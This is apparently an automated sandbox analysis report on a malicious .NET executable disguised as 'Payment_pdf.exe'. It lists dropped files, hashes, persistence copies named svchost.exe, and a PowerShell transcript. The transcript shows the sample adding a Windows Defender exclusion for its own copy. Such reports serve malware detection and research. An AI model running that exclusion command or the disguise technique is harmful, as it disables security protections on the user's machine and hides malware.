                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7794.tmp.dmp
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Feb 23 17:29:20 2021, 0x1205a4 type
                                                                      Category:dropped
                                                                      Size (bytes):207516
                                                                      Entropy (8bit):4.394976674422895
                                                                      Encrypted:false
                                                                      SSDEEP:3072:fUCgUej1lo+J0Ujd+p/+ReLUEjUEhx9gIOgF5H/h0mACh:fTjej70VpVLH39RpDH5N
                                                                      MD5:F7B5DD4EBB8C4772283E477531AE05AA
                                                                      SHA1:4A8C92F3C60E84D0DFF08F4AB3E5B269B4FE87ED
                                                                      SHA-256:2161B949DA64D0B379535E048F510E24E4871A7E212AE766E14A1257EA8951ED
                                                                      SHA-512:661D27CF0FA0FBD1FAA1F902A182841C19A3049CE67FAB5202AE8542E6BE62B387231BAC64436567B7974533BF193F5756256280557EBFDE88222390F96F6090
                                                                      Malicious:false
                                                                      Preview: MDMP....... .......p;5`...................U...........B.......*......GenuineIntelW...........T.......8...?;5`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B1A.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):8018
                                                                      Entropy (8bit):3.700169899286808
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNi3o6A6YJYSUwxECgmfZ4S9DCpr889bFtsf0YXm:RrlsNiY6A6YmSUwxECgmfSSAFmf0F
                                                                      MD5:48F6AD50BD6597C004C20D8276805213
                                                                      SHA1:676230B102CC377DC8706DCFAB8D28F0E6EAB4D0
                                                                      SHA-256:2FD6E3CD338007BFB4CAA80F20E412705384AB2C23A398706D7B27DBA2EFDF68
                                                                      SHA-512:26391F3B718AFA6C69E597EBD80A822A9440E3FEF202E6FB321C4057F91086B878C07C60FF2C529C355B32D0AEC7A11C4567DAD66F2B1C9266F3F1CC0817D8A3
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.6.8.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA28E.tmp.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4694
                                                                      Entropy (8bit):4.466549536568872
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsdJgtWI9IOWSC8Be8fm8M4Jw4WFFZw+q8vAWOHdUPUl2RrGd:uITf3nvSN5JwWKi2PIgrGd
                                                                      MD5:188FE76C15565BE5C92F3F57BAA66E0F
                                                                      SHA1:BB521AA888B0A0BC1BFA58EA49965E708774DD0E
                                                                      SHA-256:F26FAE2D64E65B5751338463035457FA8C3F32FEDA9B5F181293F75CA08F4CA2
                                                                      SHA-512:79B0B439951D890FDF32EC65BE87DD51456539AC7D1B872489D345DA70F2AAE1D2D56C412DF21046FCF2010CBEC5EEE65AF634592A09922650F13B6108728724
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="874240" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA2BA.tmp.csv
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):57500
                                                                      Entropy (8bit):3.070256499083689
                                                                      Encrypted:false
                                                                      SSDEEP:768:ubHOlMXEKDcHhMLCOnA0gU6kKuQkU3ouB3U12OZeJgE3z:ubHOlSAHhMLCOnA0gU6IQkGouRUpgTz
                                                                      MD5:49E96D7115C4E7BFC606BEFD449DC993
                                                                      SHA1:95E8D11D4F716B5F63923504AA4CC9FFB98308AF
                                                                      SHA-256:BD7301103AA28A00B323A4C8BE833D79F164B7BADC66C97145AB7AB5C497C59E
                                                                      SHA-512:B020EFCE07BC7EBEEB7FC5F46F9BC4E220CA7DA23D227A41D71305313E490F50844CDF921783FED3E519FE332418B8FBA2279A8FF0E8A7F4C25F3C9E3F0BE47E
                                                                      Malicious:false
                                                                      Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD1C.tmp.txt
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):13340
                                                                      Entropy (8bit):2.6962087899186655
                                                                      Encrypted:false
                                                                      SSDEEP:96:9GiZYWYCuclSYYYdW0HgUYEZC/Jtfi5lcOM8wicslfaRTiFhN4IE/3:9jZDYnvZ/yFFaRTiFhlE/3
                                                                      MD5:6F9B231D05FDB698AB1C98A6476BEAE2
                                                                      SHA1:5D575437EF8EC1CAD5CC8F374386EB68454D7D07
                                                                      SHA-256:15F4BE9F8AB9B118CABE32C7F951498A4B82D653AB49BB12202B701C29692CF8
                                                                      SHA-512:B5565EB0FB5F022A636C9E91231DA278299E5B1A8E8701591B05F8B1E8565780DEE9AEFD3848F2FB1D134A7B24D5183CFF4B408B1CC762C41B33B0C20345B021
                                                                      Malicious:false
                                                                      Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):14734
                                                                      Entropy (8bit):4.993014478972177
                                                                      Encrypted:false
                                                                      SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                      MD5:8D5E194411E038C060288366D6766D3D
                                                                      SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                      SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                      SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                      Malicious:false
                                                                      Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):22308
                                                                      Entropy (8bit):5.6013868226329375
                                                                      Encrypted:false
                                                                      SSDEEP:384:5tCDCSgTV66UZnj+ub+RwS0nOul6o3D7Y9gxSJUeRe1BMrmbiSRV7vqqAu64I+9Y:I9jZ7TOulP33xXeNqbrFk
                                                                      MD5:B28A2DAFB79708F456B60E9C31BE631F
                                                                      SHA1:01363614294FF52103C241153940972F7284456B
                                                                      SHA-256:ED6BD84739FA64C45873CF904F8233BD389B91367CBB4CEF068445BF8E81CE0C
                                                                      SHA-512:1D36DAE575279D0DD72FCFFA7E9A5644AA540CBEEB6CD1225E390BDD64A9CBE5FC76D1EB7A5977049831F56020CA5C8B3942435411C794DEBC098AF600E10136
                                                                      Malicious:false
                                                                      Preview: @...e.....................m.|.n.S.....?..............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oebs23ox.3ze.ps1
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview: 1
                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wraqb44f.o35.psm1
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview: 1
                                                                      C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe
                                                                      Process:C:\Users\user\Desktop\Payment_pdf.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):630336
                                                                      Entropy (8bit):4.32281371669708
                                                                      Encrypted:false
                                                                      SSDEEP:6144:PXusEgNEfAWqGjfSJ7i/gvo0CzGD2uYRfw+xHgpkmygmm4uLpSXKmty:PyjjqJ7i//zRupYAhZjkjty
                                                                      MD5:AA4F187DF7370B07D17CBE08ABD778A0
                                                                      SHA1:E2CF0A14A87A8B87C15634F062C9B54F687C5D83
                                                                      SHA-256:FE378F1E009B2B77C3E08DE81D767A79FEE3BCE433810158B3BE3D470BAAC6B7
                                                                      SHA-512:E454374E1862FEB88071920732952E8C6243E300C236EF97707AC0D1D085E30D074138865955A1E875B83612C7CEC39ACB7635CAD68BD6D334B54A4277B06DA9
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}...............0..~.............. ........@.. ....................................@.................................|...O.......................@............................................................ ............... ..H............text....|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B........................H.......4b..H:...........................................................*".(.....*.s.........s.........s.........s.........*B.(.......(.....*...0...........rX..p....r\..p....s........+... .......(...+o,.......88.......(-...........(........(.................(/...o%...&.....(0...........:...................o'.........o1.......8........*........$.j........0...........rh..p....r~..p....s........+...#.......(...+o,.......88.......(-...........(........(.................(/...o%..
                                                                      C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe:Zone.Identifier
                                                                      Process:C:\Users\user\Desktop\Payment_pdf.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:modified
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                      C:\Users\user\Documents\20210223\PowerShell_transcript.936905.KHdwfTvI.20210223092902.txt
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):5911
                                                                      Entropy (8bit):5.385014580842806
                                                                      Encrypted:false
                                                                      SSDEEP:96:BZtTLINQAqDo1ZV4Z/TLINQAqDo1Zx8vE+vEEvEjZ5TLINQAqDo1ZrvvE0vE0vEa:nb/ZppP
                                                                      MD5:C01B4B02B241A283B12D9A1AF1747700
                                                                      SHA1:43EF03AB8BE81503B83F69A3FE7A016C06CBAFED
                                                                      SHA-256:948A9EFBC43CF33F1CF0EE2033F43EC2DD0ED1F3160F92E333C65219D945D0FA
                                                                      SHA-512:C2AB514853DCA7583C9E52B7A0288FCAB4D0323A10E86806BF183C8D4FE53163E6D8DE06DA2B1DA59B3335D2481277DF5EA6605614F5B195E580060D4336473D
                                                                      Malicious:false
                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210223092923..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 936905 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe -Force..Process ID: 4388..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210223092924..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210223093157..Usernam
                                                                      C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe
                                                                      Process:C:\Users\user\Desktop\Payment_pdf.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):630336
                                                                      Entropy (8bit):4.32281371669708
                                                                      Encrypted:false
                                                                      SSDEEP:6144:PXusEgNEfAWqGjfSJ7i/gvo0CzGD2uYRfw+xHgpkmygmm4uLpSXKmty:PyjjqJ7i//zRupYAhZjkjty
                                                                      MD5:AA4F187DF7370B07D17CBE08ABD778A0
                                                                      SHA1:E2CF0A14A87A8B87C15634F062C9B54F687C5D83
                                                                      SHA-256:FE378F1E009B2B77C3E08DE81D767A79FEE3BCE433810158B3BE3D470BAAC6B7
                                                                      SHA-512:E454374E1862FEB88071920732952E8C6243E300C236EF97707AC0D1D085E30D074138865955A1E875B83612C7CEC39ACB7635CAD68BD6D334B54A4277B06DA9
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}...............0..~.............. ........@.. ....................................@.................................|...O.......................@............................................................ ............... ..H............text....|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B........................H.......4b..H:...........................................................*".(.....*.s.........s.........s.........s.........*B.(.......(.....*...0...........rX..p....r\..p....s........+... .......(...+o,.......88.......(-...........(........(.................(/...o%...&.....(0...........:...................o'.........o1.......8........*........$.j........0...........rh..p....r~..p....s........+...#.......(...+o,.......88.......(-...........(........(.................(/...o%..
                                                                      C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exe:Zone.Identifier
                                                                      Process:C:\Users\user\Desktop\Payment_pdf.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:modified
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):55
                                                                      Entropy (8bit):4.306461250274409
                                                                      Encrypted:false
                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                      Malicious:false
                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):4.32281371669708
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:Payment_pdf.exe
                                                                      File size:630336
                                                                      MD5:aa4f187df7370b07d17cbe08abd778a0
                                                                      SHA1:e2cf0a14a87a8b87c15634f062c9b54f687c5d83
                                                                      SHA256:fe378f1e009b2b77c3e08de81d767a79fee3bce433810158b3be3d470baac6b7
                                                                      SHA512:e454374e1862feb88071920732952e8c6243e300c236ef97707ac0d1d085e30d074138865955a1e875b83612c7cec39acb7635cad68bd6d334b54a4277b06da9
                                                                      SSDEEP:6144:PXusEgNEfAWqGjfSJ7i/gvo0CzGD2uYRfw+xHgpkmygmm4uLpSXKmty:PyjjqJ7i//zRupYAhZjkjty
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}...............0..~............... ........@.. ....................................@................................

                                                                      File Icon

                                                                      Icon Hash:00828e8e8686b000

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x499cce
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:true
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0xF27DBEB9 [Tue Dec 2 02:51:37 2098 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:v4.0.30319
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Authenticode Signature

                                                                      Signature Valid:false
                                                                      Signature Issuer:C=?????????????????????????????????????, S=&#233;&#134;&#138;&#233;&#133;&#151;&#233;&#133;&#165;&#233;&#133;&#191;&#233;&#133;&#169;&#233;&#134;&#143;&#233;&#133;&#185;&#233;&#133;&#157;&#233;&#134;&#143;&#233;&#134;&#136;&#233;&#134;&#142;&#233;&#134;&#132;&#233;&#133;&#187;&#233;&#134;&#141;&#233;&#133;&#160;&#233;&#133;&#153;&#233;&#133;&#173;&#233;&#133;&#160;&#233;&#134;&#131;&#233;&#133;&#152;&#233;&#134;&#136;&#233;&#133;&#176;&#233;&#133;&#153;&#233;&#134;&#131;&#233;&#134;&#133;&#233;&#134;&#143;&#233;&#133;&#173;&#233;&#133;&#169;&#233;&#133;&#158;&#233;&#133;&#176;&#233;&#133;&#191;&#233;&#133;&#176;&#233;&#133;&#159;&#233;&#134;&#141;&#233;&#133;&#171;&#233;&#133;&#151;&#233;&#133;&#188;&#233;&#133;&#151;&#233;&#134;&#138;&#233;&#133;&#163;&#233;&#133;&#151;&#233;&#133;&#153;&#233;&#133;&#166;&#233;&#134;&#137;&#233;&#133;&#151;, L=&#226;&#162;&#169;&#226;&#162;&#168;&#226;&#163;&#142;&#226;&#163;&#136;&#226;&#163;&#134;&#226;&#163;&#139;&#226;&#162;&#171;&#226;&#162;&#168;&#226;&#163;&#128;&#226;&#162;&#186;&#226;&#163;&#128;&#226;&#162;&#168;&#226;&#162;&#167;&#226;&#162;&#160;&#226;&#162;&#168;&#226;&#162;&#166;&#226;&#162;&#178;&#226;&#163;&#137;&#226;&#162;&#159;&#226;&#162;&#177;&#226;&#162;&#158;, T=&#233;&#178;&#134;&#233;&#178;&#143;&#233;&#177;&#183;&#233;&#177;&#159;&#233;&#177;&#184;&#233;&#177;&#183;&#233;&#177;&#172;&#233;&#178;&#131;&#233;&#177;&#159;&#233;&#177;&#168;&#233;&#177;&#173;&#233;&#177;&#156;&#233;&#177;&#189;, E=??????????????????, 